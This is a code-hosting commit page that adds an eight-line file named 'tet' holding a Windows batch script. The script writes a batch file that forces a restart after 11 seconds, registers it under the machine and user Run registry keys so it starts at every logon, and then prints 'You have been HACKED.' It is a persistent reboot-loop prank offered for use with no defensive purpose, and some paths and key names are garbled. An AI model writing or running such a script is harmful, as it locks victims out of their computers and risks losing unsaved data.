Create tet
Browse files
tet
ADDED
|
@@ -0,0 +1,8 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
echo @echo off>c:windowshartlell.bat
|
| 2 |
+
echo break off>>c:windowshartlell.bat
|
| 3 |
+
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
|
| 4 |
+
echo end>>c:windowshartlell.bat
|
| 5 |
+
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
|
| 6 |
+
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f
|
| 7 |
+
echo You have been HACKED.
|
| 8 |
+
PAUSE
|